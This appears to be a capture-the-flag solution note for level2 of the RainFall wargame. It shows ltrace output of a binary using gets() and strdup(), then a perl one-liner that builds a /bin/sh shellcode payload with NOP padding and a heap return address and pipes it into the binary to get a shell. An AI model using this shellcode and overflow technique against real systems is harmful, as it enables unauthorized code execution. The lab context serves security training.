level2@RainFall:~$ echo "42" | ltrace ./level2
__libc_start_main(0x804853f, 1, 0xbffff804, 0x8048550, 0x80485c0 <unfinished ...>
fflush(0xb7fd1a20)                                                                      = 0
gets(0xbffff70c, 0, 0, 0xb7e5ec73, 0x80482b5)                                           = 0xbffff70c
puts("42"42
)                                                                                       = 3
strdup("42")                                                                            = 0x0804a008
+++ exited (status 8) +++

SHELL_CODE (45) + RDM (35) + strdup_ret(0x0804a008)

perl -e 'print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
                . "\x90" x 35
                . "\x08\xa0\x04\x08\n"' > /tmp/level2 && cat /tmp/level2 - | ./level2